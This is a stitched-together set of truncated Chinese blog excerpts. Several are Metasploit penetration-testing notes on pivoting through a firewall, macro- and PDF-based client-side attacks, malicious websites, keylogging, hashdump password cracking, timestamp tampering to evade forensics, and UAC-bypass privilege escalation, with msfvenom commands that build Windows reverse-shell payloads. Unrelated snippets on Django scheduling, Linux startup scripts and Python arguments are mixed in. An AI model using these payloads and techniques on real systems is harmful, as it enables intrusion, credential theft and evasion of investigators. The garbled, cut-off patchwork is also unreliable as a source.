跳板 假设有这样一个场景,有一个局域网内网网关是1.1.1.1,局域网里的主机1是kali,它经过一个防火墙连接到公网,主机2和主机3在另一个内网网关为2.1.1.1的局域网,由于防火墙做了设置,只有主机2可以通过防火墙连接到公网,主机3无法通过防火墙连接到公网,但是主机2和主机3是互联的.两个局域网可以通过公网的路由相互连接. 防火墙1设置了端口映射规则,将防火墙的4444端口映射到主机1的4444端口,当主机1侦听本机的4444端口时相当于侦听防火墙的4444端口 主机1已经获得了主机2的s…
弱点扫描 根据信息收集的结果搜索漏洞利用模块 结合外部漏洞扫描系统对大IP地址段进行批量扫描 误报率.漏报率 VNC密码破解 客户端渗透 VBScript感染方式 利用  宏  感染word.excel文档 绕过某些基于文件类型检查的安全机制 一般人对word.excel的格式看来是没有安全威胁的,没有防范 生成Payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1…
这个漏洞利用只在XP上有效 利用pdf漏洞利用payload exploit生成一个pdf文件 传到被攻击机上 启动msf侦听 exploit -j XP上双击运行这个pdf时,kali获取到一个shell 构造恶意网站 exploit 生成一个网站 被攻击者点到这个网站时 攻击机就获得了一个session 提权 开启键盘记录,结果记录到以下文件中 利用flash插件漏洞执行payload 要满足这样一个条件 生成一个服务 当被攻击者点开这个网址 攻击者就收到了一个shell 类似的攻击模块还有…
Django搭建的服务器一般都用作WEB网站进行访问,通常的形式是用户访问网站或点击按钮发送请求,Django检测到请求后进行相应的试图函数处理后返回页面给用户. 但是,我们有时会需要有一些后台自动运行的任务,即使没有用户请求时也要自动运行,或者是定时运行或者是不断运行,怎么做呢?这里用到一个模块APScheduler这样的一个库,我们需要先安装一下.这里用的是2.1.2的版本,现在已经最新版升级到3.x.x,两种版本有较大不同.向学习3版本的,请看另一篇博客:Python APSchedule…
测试环境:CentOS6.5 管理员:root 普通用户:test1 实现目标:在Linux启动时,以普通用户test1自动运行位于根目录下的脚本程序test.py,该程序会在每次执行时自动向本地日志文件追加一条记录,源码如下: from datetime import datetime now=datetime.now() f=open('test.log','a') f.write('%s '%now) f.close() Linux在启动时,会自动执行/etc/rc.d目录下的初始化程序,…
在python项目的开发的过程中, 经常需要运行各种python脚本, 有时候还需要根据不同的使用情况输入不同的参数, 如果每次都去编辑一下脚本那就太麻烦,太耗费时间了, 这时就可以使用Python自带的sys模块进行处理, 运行脚本时, 通过sys获取在命令行中输入的参数,极大的方便的我们的开发, 提高开发效率 一个简单的demo如下, 输入: from sys import argv print(argv[0], argv[1]) print(argv) 终端中运行脚本: (py3) jin…
大家好,我是良许. 在工作中,我们经常有个需求,那就是在系统启动之后,自动启动某个脚本或服务.在 Windows 下,我们有很多方法可以设置开机启动,但在 Linux 系统下我们需要如何操作呢? Linux 下同样可以设置开机启动,但可能需要我们敲一些命令(可能也有 UI 界面的设置方法,但我不熟,我更多是玩命令).下面我们就介绍三种简单但可行的开机启动设置方法. 方法一:修改 /etc/rc.d/rc.local 文件 /etc/rc.d/rc.local 文件会在 Linux 系统各项服务都…
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行payload 诱骗被害者执行payload(windows) msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shi…
嗅探抓包 查看网卡 指定网卡,因为资源有限,默认抓满50000个包如果不dump下来,就会自动销毁掉,从0开始抓. dump嗅探到的文件到本机,传递到本机的过程是结果ssl加密的 dump了两个文件 解包 指定想要解包文件 run 搜索文件 破解弱口令 需要有一个system权限的session 使用hashdump 使用system权限的session exploit 结果保存在/tmp目录下 使用弱密码破解工具 run执行 修改MACE时间 最好的避免电子取证发现的方法:不要碰文件系统 me…
对普通权限session提权 生成一个木马 开启Apache服务 将木马上传网页 被攻击者从这个网页上获取到这个木马 攻击者开启msf侦听 当被攻击者双击这个木马文件时 攻击者就获取到一个session 进入到这个session 加载priv模块getsystem提权,但是失败了,这是由于win7系统上UAC的限制 后退 使用提权模块ask 使用刚才那个没有提权权限的session 1 exploit 被攻击者就会收到一个对话框,如果点了yes 攻击者就会收到一个session sessions…